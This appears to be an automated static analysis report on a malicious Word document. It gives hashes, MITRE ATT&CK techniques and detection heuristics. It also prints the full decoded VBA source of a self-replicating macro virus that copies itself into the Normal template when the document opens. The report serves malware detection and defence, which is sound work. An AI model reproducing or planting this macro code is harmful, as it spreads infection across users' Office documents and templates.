Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 471150a996afefe7…

MALICIOUS

Office (OLE) / .DOC

48.5 KB Created: 2025-07-25 02:17:00 Authoring application: Microsoft Office Word First seen: 2026-06-24
MD5: 7bd5f09c68de9c76a523f922ad1bc60e SHA-1: 8883cc69446e8c3b9afefc21cdfef06fff566af4 SHA-256: 471150a996afefe7c9ad19c064140efe1fe7ed7a5f92eac94bc5cbef61ce6eca
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1070.004 Indicator Removal: File Deletion

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro attempts to replicate its code into the Normal template and potentially tamper with AV detection by writing 'APMPKILL' to the Normal template's code. This behavior suggests an attempt to achieve persistence and evade detection.

Heuristics 5

  • ClamAV: Doc.Macro.APMPKILL-6097118-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.APMPKILL-6097118-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
              .DeleteLines 1, .CountOfLines
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1025 bytes
SHA-256: b6bb40c3324a9a55276682d3a04936515debedc19798cd9b4db60b6bc4ef53ca
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'KILL
   On Error Resume Next
    Set prevDocument = NormalTemplate
    Set prevDocument = ActiveDocument
    Set nextDocument = NormalTemplate
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
          .DeleteLines 1, .CountOfLines
          .InsertLines 1, MyCode
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName
       End If
   End With
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.